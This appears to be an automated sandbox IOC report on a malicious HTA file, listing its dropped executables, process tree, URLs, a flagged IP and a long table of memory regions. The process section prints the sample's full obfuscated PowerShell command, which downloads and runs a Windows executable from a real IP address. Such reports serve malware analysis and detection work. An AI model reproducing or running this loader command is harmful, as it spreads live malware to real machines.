IOC Report
seemejkiss.hta

loading gif

Files

File Path
Type
Category
Malicious
seemejkiss.hta
HTML document, ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\winnit.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
dropped
C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.out
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\Glagolitic
data
dropped
C:\Users\user\AppData\Local\Temp\RES3925.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Sat Dec 7 16:45:41 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjwt3tzc.v2e.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mos5rxu3.ovp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqum0uuf.v2f.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wohg2k5o.5u2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\aut54AB.tmp
data
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\seemejkiss.hta"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline"
malicious
C:\Users\user\AppData\Roaming\winnit.exe
"C:\Users\user\AppData\Roaming\winnit.exe"
malicious
C:\Windows\SysWOW64\svchost.exe
"C:\Users\user\AppData\Roaming\winnit.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3925.tmp" "c:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP"

URLs

Name
IP
Malicious
http://107.175.113.196/400/win.exe
107.175.113.196
malicious
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://aka.ms/pscore6lB
unknown
http://107.175.113.196/400/win.exeV
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://107.175.113.196/400/win.e
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 6 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
107.175.113.196
unknown
United States
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
system
page execute and read and write
malicious
3950000
direct allocation
page read and write
malicious
3909000
direct allocation
page read and write
5251000
heap
page read and write
697A000
heap
page read and write
5FC3000
heap
page read and write
5DD0000
heap
page read and write
6276000
trusted library allocation
page read and write
6038000
heap
page read and write
6930000
heap
page read and write
1026000
heap
page read and write
35D2000
heap
page read and write
6670000
trusted library allocation
page read and write
5D68000
heap
page read and write
3213000
heap
page read and write
5DD1000
heap
page read and write
691F000
stack
page read and write
E4E000
stack
page read and write
7A0000
heap
page read and write
6187000
trusted library allocation
page read and write
172E000
stack
page read and write
2E23000
heap
page read and write
6982000
heap
page read and write
6987000
heap
page read and write
60E5000
trusted library allocation
page read and write
3213000
heap
page read and write
380F000
stack
page read and write
3405000
heap
page read and write
5CC3000
heap
page read and write
2E00000
trusted library allocation
page read and write
7D5000
heap
page read and write
5F9C000
heap
page read and write
32F9000
trusted library allocation
page read and write
88B1000
heap
page read and write
8E0000
heap
page read and write
3213000
heap
page read and write
5F5D000
heap
page read and write
6791000
trusted library allocation
page read and write
524E000
stack
page read and write
3909000
direct allocation
page read and write
3400000
heap
page read and write
697A000
heap
page read and write
77CF000
stack
page read and write
692A000
heap
page read and write
8BC0000
trusted library allocation
page read and write
524C000
heap
page read and write
6773000
trusted library allocation
page read and write
384E000
stack
page read and write
55DE000
stack
page read and write
5230000
heap
page read and write
6075000
heap
page read and write
5F52000
heap
page read and write
FC9000
heap
page read and write
6085000
heap
page read and write
3200000
heap
page read and write
6055000
heap
page read and write
37E0000
direct allocation
page read and write
6974000
heap
page read and write
8812000
trusted library allocation
page read and write
920000
heap
page read and write
5FB3000
heap
page read and write
724B000
stack
page read and write
605D000
heap
page read and write
54E4000
trusted library allocation
page read and write
78B8000
heap
page read and write
3213000
heap
page read and write
39B0000
direct allocation
page read and write
7560000
heap
page read and write
F6F000
heap
page execute and read and write
3DD1000
direct allocation
page execute and read and write
745A000
stack
page read and write
9CE000
stack
page read and write
5F65000
heap
page read and write
370E000
stack
page read and write
5E45000
heap
page read and write
5CC2000
heap
page read and write
5F67000
heap
page read and write
6962000
heap
page read and write
9DB000
heap
page read and write
47C6000
heap
page read and write
D88000
stack
page read and write
2E60000
heap
page read and write
608E000
heap
page read and write
5FB2000
heap
page read and write
4FF0000
trusted library allocation
page read and write
637D000
heap
page read and write
5F65000
heap
page read and write
92E000
heap
page read and write
39A0000
direct allocation
page read and write
698F000
heap
page read and write
18E0000
heap
page read and write
608D000
heap
page read and write
3213000
heap
page read and write
6FFC000
stack
page read and write
698F000
heap
page read and write
603E000
heap
page read and write
71C5000
heap
page execute and read and write
6055000
heap
page read and write
6034000
heap
page read and write
892E000
heap
page read and write
6055000
heap
page read and write
8E8C000
stack
page read and write
6987000
heap
page read and write
6055000
heap
page read and write
F38000
heap
page read and write
71C0000
heap
page execute and read and write
5FA7000
heap
page read and write
6991000
heap
page read and write
5FE0000
heap
page read and write
8690000
trusted library allocation
page read and write
749E000
stack
page read and write
5D32000
heap
page read and write
3213000
heap
page read and write
2E6A000
heap
page read and write
49B0000
heap
page read and write
840E000
direct allocation
page read and write
504C000
stack
page read and write
605D000
heap
page read and write
6330000
heap
page read and write
699C000
heap
page read and write
2FF0000
heap
page read and write
1026000
heap
page read and write
B6E000
unkown
page read and write
6F86000
direct allocation
page read and write
6075000
heap
page read and write
7ACE000
stack
page read and write
8F00000
trusted library allocation
page read and write
65A0000
trusted library allocation
page read and write
7C50000
trusted library allocation
page read and write
5F58000
heap
page read and write
A1E000
stack
page read and write
713E000
stack
page read and write
637D000
heap
page read and write
9DB000
stack
page read and write
5C75000
heap
page read and write
5E69000
heap
page read and write
6056000
heap
page read and write
695C000
heap
page read and write
6055000
heap
page read and write
6950000
heap
page read and write
5271000
heap
page read and write
3656000
heap
page read and write
6969000
heap
page read and write
3590000
trusted library allocation
page read and write
87C0000
trusted library allocation
page read and write
3310000
trusted library allocation
page read and write
6087000
heap
page read and write
5140000
heap
page read and write
3C2D000
direct allocation
page execute and read and write
93D000
heap
page read and write
6799000
trusted library allocation
page read and write
3213000
heap
page read and write
6976000
heap
page read and write
928000
heap
page read and write
717E000
stack
page read and write
6075000
heap
page read and write
6075000
heap
page read and write
527A000
heap
page read and write
3640000
direct allocation
page read and write
8FE000
heap
page read and write
6976000
heap
page read and write
60E7000
trusted library allocation
page read and write
681E000
stack
page read and write
7180000
heap
page read and write
6982000
heap
page read and write
37E0000
direct allocation
page read and write
6089000
heap
page read and write
5FBB000
heap
page read and write
5EB4000
heap
page read and write
32E0000
trusted library allocation
page read and write
FA5000
heap
page read and write
697D000
heap
page read and write
6974000
heap
page read and write
6738000
trusted library allocation
page read and write
6034000
heap
page read and write
5F5C000
heap
page read and write
5E71000
heap
page read and write
9C5000
heap
page read and write
6087000
heap
page read and write
7B0000
heap
page read and write
626E000
trusted library allocation
page read and write
5FBD000
heap
page read and write
699F000
heap
page read and write
8F85000
trusted library allocation
page read and write
8A50000
trusted library allocation
page read and write
925000
heap
page read and write
5080000
heap
page execute and read and write
995000
heap
page read and write
8740000
heap
page read and write
995000
heap
page read and write
3213000
heap
page read and write
32E4000
trusted library allocation
page read and write
3501000
heap
page read and write
57DE000
stack
page read and write
6055000
heap
page read and write
6999000
heap
page read and write
528D000
heap
page read and write
6184000
trusted library allocation
page read and write
6056000
heap
page read and write
618B000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
949000
heap
page read and write
6580000
trusted library allocation
page execute
8760000
trusted library allocation
page read and write
8927000
heap
page read and write
7C60000
trusted library allocation
page read and write
52A3000
heap
page read and write
608C000
heap
page read and write
8750000
trusted library allocation
page execute and read and write
5145000
heap
page read and write
6075000
heap
page read and write
5FAB000
heap
page read and write
37E0000
direct allocation
page read and write
F74000
heap
page read and write
605D000
heap
page read and write
5FBD000
heap
page read and write
695C000
heap
page read and write
5F5C000
heap
page read and write
612A000
trusted library allocation
page read and write
32F0000
trusted library allocation
page read and write
94A000
heap
page read and write
32D0000
trusted library allocation
page read and write
70FC000
stack
page read and write
5FB0000
heap
page read and write
6957000
heap
page read and write
8400000
direct allocation
page read and write
5FDD000
heap
page read and write
934000
heap
page read and write
33DE000
stack
page read and write
699F000
heap
page read and write
9DB000
heap
page read and write
6987000
heap
page read and write
60DA000
trusted library allocation
page read and write
6987000
heap
page read and write
6952000
heap
page read and write
8770000
trusted library allocation
page read and write
A5E000
stack
page read and write
6040000
heap
page read and write
39B0000
direct allocation
page read and write
5F65000
heap
page read and write
5E43000
heap
page read and write
522C000
heap
page read and write
35A0000
heap
page read and write
6933000
heap
page read and write
921000
heap
page read and write
3A9E000
heap
page read and write
618F000
trusted library allocation
page read and write
915C000
stack
page read and write
695C000
heap
page read and write
D80000
heap
page read and write
770E000
stack
page read and write
5E43000
heap
page read and write
739E000
stack
page read and write
3213000
heap
page read and write
935000
heap
page read and write
5E76000
heap
page read and write
6075000
heap
page read and write
5E6F000
heap
page read and write
921000
heap
page read and write
5120000
heap
page read and write
5FDF000
heap
page read and write
3DCD000
direct allocation
page execute and read and write
3213000
heap
page read and write
699B000
heap
page read and write
6957000
heap
page read and write
3E0000
heap
page read and write
5FA5000
heap
page read and write
972000
heap
page read and write
5FB0000
heap
page read and write
5F67000
heap
page read and write
66F0000
trusted library allocation
page read and write
697A000
heap
page read and write
605D000
heap
page read and write
699F000
heap
page read and write
33F0000
heap
page read and write
5100000
heap
page read and write
5218000
heap
page read and write
390D000
direct allocation
page read and write
3397000
heap
page read and write
6982000
heap
page read and write
6976000
heap
page read and write
5F67000
heap
page read and write
3315000
trusted library allocation
page execute and read and write
157E000
stack
page read and write
6974000
heap
page read and write
70FD000
stack
page read and write
F53000
heap
page read and write
5FA7000
heap
page read and write
6957000
heap
page read and write
8892000
heap
page read and write
7100000
heap
page read and write
52A1000
heap
page read and write
639000
stack
page read and write
69A0000
heap
page read and write
52A3000
heap
page read and write
637D000
heap
page read and write
695C000
heap
page read and write
83E0000
direct allocation
page read and write
94B000
heap
page read and write
3763000
direct allocation
page read and write
2C6E000
stack
page read and write
B64000
unkown
page readonly
66B0000
trusted library allocation
page read and write
605D000
heap
page read and write
6976000
heap
page read and write
397E000
direct allocation
page read and write
7F3B0000
trusted library allocation
page execute and read and write
4FFB000
stack
page read and write
735B000
stack
page read and write
697D000
heap
page read and write
7894000
heap
page read and write
912000
heap
page read and write
921000
heap
page read and write
5FC8000
heap
page read and write
9C5000
heap
page read and write
3417000
heap
page read and write
890F000
heap
page read and write
3412000
heap
page read and write
6055000
heap
page read and write
FC4000
heap
page read and write
F8D000
heap
page read and write
3213000
heap
page read and write
8830000
trusted library allocation
page execute and read and write
60D5000
trusted library allocation
page read and write
5F50000
heap
page read and write
3763000
direct allocation
page read and write
5CC2000
heap
page read and write
AB0000
unkown
page readonly
3213000
heap
page read and write
5273000
heap
page read and write
13E0000
heap
page read and write
528D000
heap
page read and write
6957000
heap
page read and write
330A000
trusted library allocation
page execute and read and write
693A000
heap
page read and write
93C000
heap
page read and write
6982000
heap
page read and write
5D68000
heap
page read and write
6965000
heap
page read and write
6962000
heap
page read and write
6087000
heap
page read and write
60E9000
trusted library allocation
page read and write
3763000
direct allocation
page read and write
8D3E000
stack
page read and write
78C1000
heap
page read and write
5190000
heap
page read and write
6933000
heap
page read and write
932000
heap
page read and write
3640000
direct allocation
page read and write
720F000
stack
page read and write
3213000
heap
page read and write
698F000
heap
page read and write
8EF0000
trusted library allocation
page read and write
3763000
direct allocation
page read and write
5F9A000
heap
page read and write
6F82000
direct allocation
page read and write
932000
heap
page read and write
699A000
heap
page read and write
5FDC000
heap
page read and write
925000
heap
page read and write
3213000
heap
page read and write
637F000
heap
page read and write
6969000
heap
page read and write
52A3000
heap
page read and write
9FC000
stack
page read and write
1530000
heap
page read and write
94F000
heap
page read and write
3330000
trusted library allocation
page read and write
2F1D000
stack
page read and write
337E000
stack
page read and write
697A000
heap
page read and write
397E000
direct allocation
page read and write
9BB000
heap
page read and write
6931000
heap
page read and write
5E76000
heap
page read and write
1580000
heap
page read and write
605D000
heap
page read and write
785B000
heap
page read and write
3213000
heap
page read and write
5F67000
heap
page read and write
6087000
heap
page read and write
6331000
heap
page read and write
778E000
stack
page read and write
912000
heap
page read and write
6056000
heap
page read and write
6794000
trusted library allocation
page read and write
697D000
heap
page read and write
783B000
heap
page read and write
970000
heap
page read and write
8FE000
heap
page read and write
88DA000
heap
page read and write
67B0000
trusted library allocation
page read and write
2FE0000
heap
page read and write
6F80000
direct allocation
page read and write
6731000
trusted library allocation
page read and write
B72000
unkown
page write copy
692A000
heap
page read and write
D8D000
stack
page read and write
977000
heap
page read and write
B77000
unkown
page readonly
60C1000
trusted library allocation
page read and write
728D000
stack
page read and write
780D000
heap
page read and write
5FC3000
heap
page read and write
37E0000
direct allocation
page read and write
390D000
direct allocation
page read and write
8911000
heap
page read and write
60D1000
trusted library allocation
page read and write
390D000
direct allocation
page read and write
5295000
heap
page read and write
5FBD000
heap
page read and write
6952000
heap
page read and write
6976000
heap
page read and write
7C80000
trusted library allocation
page read and write
37E0000
direct allocation
page read and write
3312000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
3213000
heap
page read and write
AB0000
unkown
page readonly
91C000
heap
page read and write
697A000
heap
page read and write
8820000
trusted library section
page read and write
699C000
heap
page read and write
3909000
direct allocation
page read and write
547C000
trusted library allocation
page read and write
397E000
direct allocation
page read and write
7562000
heap
page read and write
69A1000
heap
page read and write
2E20000
heap
page read and write
6952000
heap
page read and write
3700000
heap
page read and write
5F9A000
heap
page read and write
B64000
unkown
page readonly
6987000
heap
page read and write
7C90000
trusted library allocation
page read and write
6560000
heap
page read and write
692A000
heap
page read and write
8D60000
trusted library allocation
page read and write
94F000
heap
page read and write
3DE000
stack
page read and write
3213000
heap
page read and write
5F9C000
heap
page read and write
36D0000
direct allocation
page read and write
5FD0000
heap
page read and write
528D000
heap
page read and write
52A9000
heap
page read and write
5FB3000
heap
page read and write
697A000
heap
page read and write
3213000
heap
page read and write
637F000
heap
page read and write
6530000
heap
page read and write
697D000
heap
page read and write
3658000
heap
page read and write
6990000
heap
page read and write
5FBD000
heap
page read and write
E00000
heap
page read and write
7920000
trusted library allocation
page read and write
6087000
heap
page read and write
3763000
direct allocation
page read and write
5FB2000
heap
page read and write
3300000
trusted library allocation
page read and write
390D000
direct allocation
page read and write
50C1000
trusted library allocation
page read and write
5F65000
heap
page read and write
AB1000
unkown
page execute read
6040000
heap
page read and write
5C75000
heap
page read and write
6974000
heap
page read and write
F70000
heap
page read and write
8A60000
trusted library allocation
page read and write
3C9E000
direct allocation
page execute and read and write
5FC6000
heap
page read and write
35D6000
heap
page read and write
3676000
heap
page read and write
88B5000
heap
page read and write
6956000
heap
page read and write
3668000
heap
page read and write
4001000
heap
page read and write
873E000
stack
page read and write
390000
heap
page read and write
500A000
stack
page read and write
B6E000
unkown
page write copy
6075000
heap
page read and write
8670000
trusted library allocation
page execute and read and write
94B000
heap
page read and write
51A0000
direct allocation
page read and write
73DF000
stack
page read and write
3202000
heap
page read and write
3640000
direct allocation
page read and write
6778000
trusted library allocation
page read and write
87B0000
trusted library allocation
page read and write
327E000
stack
page read and write
679B000
trusted library allocation
page read and write
6974000
heap
page read and write
7952000
heap
page read and write
6087000
heap
page read and write
6927000
heap
page read and write
50FE000
stack
page read and write
8850000
heap
page read and write
6962000
heap
page read and write
697A000
heap
page read and write
6740000
trusted library allocation
page read and write
118B000
heap
page read and write
5241000
heap
page read and write
2FF8000
heap
page read and write
78EA000
heap
page read and write
71BE000
stack
page read and write
4FF8000
trusted library allocation
page read and write
33F7000
heap
page read and write
7C00000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
637F000
heap
page read and write
2E34000
heap
page read and write
7C70000
trusted library allocation
page read and write
94D000
heap
page read and write
5F5C000
heap
page read and write
5F58000
heap
page read and write
6928000
heap
page read and write
876B000
trusted library allocation
page read and write
3213000
heap
page read and write
67B9000
trusted library allocation
page read and write
755F000
stack
page read and write
32ED000
trusted library allocation
page execute and read and write
32A000
stack
page read and write
5256000
heap
page read and write
47C4000
heap
page read and write
7C40000
trusted library allocation
page read and write
1870000
heap
page read and write
930000
heap
page read and write
6087000
heap
page read and write
AB1000
unkown
page execute read
50FE000
stack
page read and write
6040000
heap
page read and write
8767000
trusted library allocation
page read and write
6987000
heap
page read and write
3640000
direct allocation
page read and write
3213000
heap
page read and write
605D000
heap
page read and write
3213000
heap
page read and write
FBA000
heap
page read and write
5FB0000
heap
page read and write
697D000
heap
page read and write
5EB4000
heap
page read and write
698B000
heap
page read and write
7F3C8000
trusted library allocation
page execute and read and write
2FF0000
heap
page read and write
6976000
heap
page read and write
6970000
heap
page read and write
7C20000
trusted library allocation
page read and write
5FA5000
heap
page read and write
840E000
direct allocation
page read and write
3405000
heap
page read and write
2F90000
heap
page read and write
5EEC000
heap
page read and write
924000
heap
page read and write
5FDF000
heap
page read and write
3417000
heap
page read and write
3E42000
direct allocation
page execute and read and write
697A000
heap
page read and write
94F000
heap
page read and write
699F000
heap
page read and write
52A3000
heap
page read and write
6055000
heap
page read and write
608A000
heap
page read and write
695C000
heap
page read and write
5F5A000
heap
page read and write
5470000
trusted library allocation
page read and write
1430000
heap
page read and write
3213000
heap
page read and write
6180000
trusted library allocation
page read and write
2B6E000
stack
page read and write
6982000
heap
page read and write
8BD0000
trusted library allocation
page read and write
938000
heap
page read and write
5FBB000
heap
page read and write
7930000
trusted library allocation
page execute and read and write
3763000
direct allocation
page read and write
4AE0000
heap
page read and write
3900000
heap
page read and write
B3F000
unkown
page readonly
699F000
heap
page read and write
69A4000
heap
page read and write
60DC000
trusted library allocation
page read and write
6974000
heap
page read and write
2F5C000
stack
page read and write
6920000
heap
page read and write
731D000
stack
page read and write
6933000
heap
page read and write
5F92000
heap
page read and write
3909000
direct allocation
page read and write
397E000
direct allocation
page read and write
5F67000
heap
page read and write
A3E000
stack
page read and write
5FBB000
heap
page read and write
6957000
heap
page read and write
93B000
heap
page read and write
6926000
heap
page read and write
5FBB000
heap
page read and write
6933000
heap
page read and write
B3F000
unkown
page readonly
F70000
heap
page read and write
514D000
stack
page read and write
3640000
direct allocation
page read and write
7BCD000
stack
page read and write
2FD0000
heap
page read and write
92C000
heap
page read and write
7910000
heap
page execute and read and write
6971000
heap
page read and write
5FBD000
heap
page read and write
7D0000
heap
page read and write
5FBB000
heap
page read and write
6991000
heap
page read and write
5F71000
heap
page read and write
F6B000
heap
page read and write
50B0000
heap
page read and write
5268000
heap
page read and write
78F6000
heap
page read and write
939000
heap
page read and write
6974000
heap
page read and write
9FC000
stack
page read and write
A90000
heap
page read and write
3290000
heap
page read and write
2FB0000
heap
page read and write
5269000
heap
page read and write
F63000
heap
page read and write
69A1000
heap
page read and write
6969000
heap
page read and write
893E000
heap
page read and write
5FC3000
heap
page read and write
925000
heap
page read and write
6085000
heap
page read and write
6933000
heap
page read and write
937000
heap
page read and write
32E3000
trusted library allocation
page execute and read and write
6267000
trusted library allocation
page read and write
5F52000
heap
page read and write
6976000
heap
page read and write
536E000
stack
page read and write
94F000
heap
page read and write
3213000
heap
page read and write
323D000
stack
page read and write
3C29000
direct allocation
page execute and read and write
949000
heap
page read and write
699F000
heap
page read and write
774E000
stack
page read and write
7C30000
trusted library allocation
page read and write
F70000
heap
page read and write
6987000
heap
page read and write
50BE000
stack
page read and write
6982000
heap
page read and write
3213000
heap
page read and write
5F67000
heap
page read and write
547A000
trusted library allocation
page read and write
60E1000
trusted library allocation
page read and write
1438000
heap
page read and write
911C000
stack
page read and write
6035000
heap
page read and write
6976000
heap
page read and write
33E0000
trusted library allocation
page execute and read and write
6035000
heap
page read and write
8C5E000
stack
page read and write
8840000
heap
page read and write
7140000
direct allocation
page read and write
5FAB000
heap
page read and write
546F000
stack
page read and write
741E000
stack
page read and write
7BD0000
trusted library allocation
page read and write
6962000
heap
page read and write
3390000
heap
page read and write
397E000
direct allocation
page read and write
5F5A000
heap
page read and write
3909000
direct allocation
page read and write
142E000
stack
page read and write
699F000
heap
page read and write
8923000
heap
page read and write
185F000
stack
page read and write
3A29000
heap
page read and write
88CB000
heap
page read and write
5C70000
heap
page read and write
5FA8000
heap
page read and write
35AA000
heap
page read and write
39B0000
direct allocation
page read and write
1EEE000
stack
page read and write
697D000
heap
page read and write
5250000
heap
page read and write
1027000
heap
page read and write
6FA0000
direct allocation
page read and write
69C8000
heap
page read and write
6770000
trusted library allocation
page read and write
5070000
heap
page read and write
6987000
heap
page read and write
6982000
heap
page read and write
3213000
heap
page read and write
6087000
heap
page read and write
5125000
trusted library allocation
page read and write
5247000
heap
page read and write
697D000
heap
page read and write
7160000
direct allocation
page read and write
8E4C000
stack
page read and write
86FE000
stack
page read and write
D4C000
stack
page read and write
6075000
heap
page read and write
8680000
trusted library allocation
page read and write
8DEE000
stack
page read and write
127D000
stack
page read and write
5FD5000
heap
page read and write
8E8000
heap
page read and write
619B000
trusted library allocation
page read and write
5F65000
heap
page read and write
B77000
unkown
page readonly
7A8E000
stack
page read and write
7A40000
heap
page read and write
390D000
direct allocation
page read and write
699F000
heap
page read and write
698F000
heap
page read and write
5FC3000
heap
page read and write
3909000
direct allocation
page read and write
5E71000
heap
page read and write
2E26000
heap
page read and write
D64000
heap
page read and write
3213000
heap
page read and write
87A0000
trusted library allocation
page read and write
35E0000
heap
page read and write
737000
stack
page read and write
7B8E000
stack
page read and write
7C10000
trusted library allocation
page read and write
397E000
direct allocation
page read and write
3213000
heap
page read and write
677A000
trusted library allocation
page read and write
1820000
direct allocation
page read and write
6055000
heap
page read and write
919000
heap
page read and write
912000
heap
page read and write
698C000
heap
page read and write
696F000
heap
page read and write
D60000
heap
page read and write
5E76000
heap
page read and write
6530000
trusted library allocation
page read and write
5FE2000
heap
page read and write
608B000
heap
page read and write
699F000
heap
page read and write
5FAB000
heap
page read and write
2E40000
heap
page read and write
5FB2000
heap
page read and write
995000
heap
page read and write
2E30000
heap
page read and write
74DD000
stack
page read and write
2E66000
heap
page read and write
5E7D000
heap
page read and write
608E000
heap
page read and write
37E0000
direct allocation
page read and write
692A000
heap
page read and write
E8E000
stack
page read and write
7B4F000
stack
page read and write
528E000
heap
page read and write
7B0E000
stack
page read and write
3B00000
direct allocation
page execute and read and write
523F000
heap
page read and write
8DAE000
stack
page read and write
F30000
heap
page read and write
529B000
heap
page read and write
60D3000
trusted library allocation
page read and write
47C0000
heap
